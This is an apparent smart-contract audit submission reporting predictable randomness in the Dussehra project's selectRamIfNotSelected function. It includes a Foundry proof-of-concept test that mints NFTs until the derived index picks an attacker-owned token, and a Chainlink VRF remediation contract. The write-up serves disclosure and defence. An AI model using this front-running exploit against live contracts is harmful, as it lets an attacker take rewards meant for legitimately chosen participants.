Submission Details
Severity: low
Valid

Weak pseudo-random number generation lets an attacker front-run the organiser's selectRamIfNotSelected call and win the Ram selection

Summary

A bad-randomness vulnerability occurs when a smart contract relies on a source of randomness that is not truly random or that an attacker can predict. Here the selection index is derived from block.timestamp and block.prevrandao, both of which are known to every transaction in the same block, so an attacker can compute the outcome before the selecting transaction executes and arrange the state so that the outcome favours them.

Vulnerability Details

A player can deploy a contract (or simply send a transaction) that front-runs the organiser's call to selectRamIfNotSelected. Because the selected token id is keccak256(abi.encodePacked(block.timestamp, block.prevrandao)) reduced modulo the RamNFT token counter, an attacker who lands in the same block as the organiser can compute exactly which token id the call will pick. mintRamNFT can be called directly and costs nothing beyond gas (the PoC below calls it straight from the test), so the attacker mints RamNFTs until the computed index points at a token they own, lets the organiser's selectRamIfNotSelected execute, and then collects the reward.

Impact

An attacker can front-run the organiser's selectRamIfNotSelected transaction, get themselves selected as Ram, and take the reward that was meant to go to a legitimately chosen participant.

Code Example

Add this test to the CounterTest contract in test/Dussehra.t.sol:

    function test_FrontRunSelectRamIfNotSelected() public participants {
        // The selection window opens at 1728691200. The attacker acts in the same block as
        // the organiser's selectRamIfNotSelected call, so block.timestamp and block.prevrandao
        // are identical for both transactions and the contract's hash can be reproduced exactly.
        vm.warp(1728691200 + 1);
        address attacker = address(0x123);

        uint256 hash = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao)));
        // Every token id from here on will belong to the attacker.
        uint256 firstAttackerToken = ramNFT.tokenCounter();

        // Mint until the index the contract will derive, hash % tokenCounter, lands on an
        // attacker-owned token. Each mint changes the modulus, so the index is recomputed
        // after every mint instead of being fixed once up front.
        uint256 selected;
        do {
            ramNFT.mintRamNFT(attacker);
            selected = hash % ramNFT.tokenCounter();
            console.log("Counter : ", ramNFT.tokenCounter(), "selected index : ", selected);
        } while (selected < firstAttackerToken);

        // The organiser's call now picks the attacker's token.
        vm.startPrank(organiser);
        choosingRam.selectRamIfNotSelected();
        vm.stopPrank();
        assertEq(choosingRam.isRamSelected(), true);
        assertEq(choosingRam.selectedRam(), attacker);
    }

Result
The attacker is selected as Ram:

Ran 1 test for test/Dussehra.t.sol:CounterTest
[PASS] test_FrontRunSelectRamIfNotSelected() (gas: 441490)
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 7.60ms (1.22ms CPU time)
Ran 1 test suite in 165.46ms (7.60ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)

Tools Used

Manual review.

Recommendations

Use an oracle-based randomness source such as Chainlink VRF (Verifiable Random Function), a provably fair and verifiable random number generator that lets smart contracts consume random values that nobody, including the organiser, can predict or influence in advance. Request the randomness in one transaction and select the Ram only in the oracle's callback, and freeze the set of eligible tokens at request time so that minting between request and fulfilment cannot change the result.
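The following is an added example of the hardened design, written for this review and not code from the Dussehra project. It assumes Chainlink VRF v2.5 (import paths as in @chainlink/contracts 1.x; adjust to the installed version), a minimal IRamNFT view of RamNFT exposing tokenCounter(), ERC-721 ownerOf() and organiser(), and the same selection deadline the original contract uses. The selection is split into a request step and a coordinator callback; the eligible token count is snapshotted at request time; and the callback never reverts, because VRF fulfilments are not retried.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the Dussehra project's code. Import paths are an assumption
// (Chainlink VRF v2.5 as shipped in @chainlink/contracts 1.x).
import {VRFConsumerBaseV2Plus} from "@chainlink/contracts/src/v0.8/vrf/dev/VRFConsumerBaseV2Plus.sol";
import {VRFV2PlusClient} from "@chainlink/contracts/src/v0.8/vrf/dev/libraries/VRFV2PlusClient.sol";

// Assumed minimal view of RamNFT: 0-based token ids, ERC-721 ownerOf, and the organiser address.
interface IRamNFT {
    function tokenCounter() external view returns (uint256);
    function ownerOf(uint256 tokenId) external view returns (address);
    function organiser() external view returns (address);
}

contract ChoosingRamWithVRF is VRFConsumerBaseV2Plus {
    error ChoosingRamWithVRF__NotOrganiser();
    error ChoosingRamWithVRF__RamIsAlreadySelected();
    error ChoosingRamWithVRF__RequestAlreadyPending();
    error ChoosingRamWithVRF__TimeToBeLikeRamIsNotFinish();
    error ChoosingRamWithVRF__NoParticipants();

    uint256 public constant SELECTION_OPENS = 1728691200; // same deadline as the original
    uint32 private constant CALLBACK_GAS_LIMIT = 200_000;  // assumed; size for fulfillRandomWords
    uint16 private constant REQUEST_CONFIRMATIONS = 3;

    IRamNFT public immutable ramNFT;
    bytes32 private immutable i_keyHash;
    uint256 private immutable i_subscriptionId;

    bool public isRamSelected;
    address public selectedRam;
    uint256 public pendingRequestId;
    uint256 public participantsAtRequest; // token count frozen when randomness was requested

    constructor(address _ramNFT, address vrfCoordinator, bytes32 keyHash, uint256 subscriptionId)
        VRFConsumerBaseV2Plus(vrfCoordinator)
    {
        ramNFT = IRamNFT(_ramNFT);
        i_keyHash = keyHash;
        i_subscriptionId = subscriptionId;
    }

    modifier onlyOrganiser() {
        if (msg.sender != ramNFT.organiser()) revert ChoosingRamWithVRF__NotOrganiser();
        _;
    }

    // Step 1: the organiser asks the VRF coordinator for one random word. Nothing observable
    // on-chain at this point determines the eventual index, so there is nothing to front-run,
    // and a pending request cannot be replaced to "re-roll" the outcome.
    function requestRamSelection() external onlyOrganiser returns (uint256 requestId) {
        if (isRamSelected) revert ChoosingRamWithVRF__RamIsAlreadySelected();
        if (pendingRequestId != 0) revert ChoosingRamWithVRF__RequestAlreadyPending();
        if (block.timestamp < SELECTION_OPENS) revert ChoosingRamWithVRF__TimeToBeLikeRamIsNotFinish();

        uint256 count = ramNFT.tokenCounter();
        if (count == 0) revert ChoosingRamWithVRF__NoParticipants();
        // Freeze the eligible set: tokens minted after this point cannot change the modulus.
        participantsAtRequest = count;

        requestId = s_vrfCoordinator.requestRandomWords(
            VRFV2PlusClient.RandomWordsRequest({
                keyHash: i_keyHash,
                subId: i_subscriptionId,
                requestConfirmations: REQUEST_CONFIRMATIONS,
                callbackGasLimit: CALLBACK_GAS_LIMIT,
                numWords: 1,
                extraArgs: VRFV2PlusClient._argsToBytes(VRFV2PlusClient.ExtraArgsV1({nativePayment: false}))
            })
        );
        pendingRequestId = requestId;
    }

    // Step 2: only the coordinator reaches this (VRFConsumerBaseV2Plus checks msg.sender in
    // rawFulfillRandomWords). Stale or duplicate fulfilments are ignored rather than reverted,
    // because a reverting callback is not retried by the coordinator.
    function fulfillRandomWords(uint256 requestId, uint256[] calldata randomWords) internal override {
        if (isRamSelected || requestId != pendingRequestId) return;
        uint256 index = randomWords[0] % participantsAtRequest; // always a valid 0-based token id
        selectedRam = ramNFT.ownerOf(index);
        isRamSelected = true;
        pendingRequestId = 0;
    }
}
```

Two points a reviewer would check on such a contract: the modulus is taken over participantsAtRequest, not over the live token counter, so minting between request and fulfilment is irrelevant to the outcome; and the callback has no revert path, since an unhandled revert in fulfillRandomWords would leave the subscription charged and the Ram never selected. Restricting who can call mintRamNFT is a separate issue from the randomness and is not addressed here.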

Updates

Lead Judging Commences

bube Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak randomness in `ChoosingRam::selectRamIfNotSelected`

The organizer is trusted, but the function `ChoosingRam::selectRamIfNotSelected` uses a way to generate a random number that is not completely random.
